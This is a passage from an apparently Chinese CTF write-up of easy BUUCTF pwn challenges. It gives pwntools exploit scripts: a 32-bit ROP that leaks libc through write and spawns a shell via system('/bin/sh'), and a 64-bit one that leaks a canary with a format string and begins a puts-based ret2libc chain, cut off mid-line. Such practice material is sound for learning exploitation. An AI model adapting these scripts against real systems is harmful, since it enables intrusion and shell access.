BUUCTF pwn水题大赏
铁人三项(第五赛区)_2018_rop
32位栈溢出,利用 write
泄露 libc
exp:
from pwn import*
context.log_level='DEBUG'
p=remote('node3.buuoj.cn',28788)
#p=process('./2018_rop')
libc=ELF('./libc-2.27.so')
elf=ELF('./2018_rop')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload1)
write_addr=u32(p.recv(4))
print hex(write_addr)
libc_base=write_addr-libc.sym['write']
sys=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
print hex(libc_base)
payload2='a'*0x88+'a'*4+p32(sys)+p32(main_addr)+p32(binsh)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()
bjdctf_2020_babyrop
64位栈溢出,利用 puts
泄露 libc
exp:
from pwn import*
from LibcSearcher import*
context.log_level = 'debug'
p=process('./bjdctf_2020_babyrop2')
#p=remote('node3.buuoj.cn',27713)
ret=0x00000000004005f9
pop_rdi=0x0000000000400993
elf=ELF('./bjdctf_2020_babyrop2')
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
vuln_addr=elf.symbols['vuln']
p.sendline('%7$p')
p.recvuntil('0x')
a=int(p.recv(16),16)
print hex(a)
payload1='a'*0x18+p64(a)+'a'*8+p64(ret)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
p.sendlineafter('story!'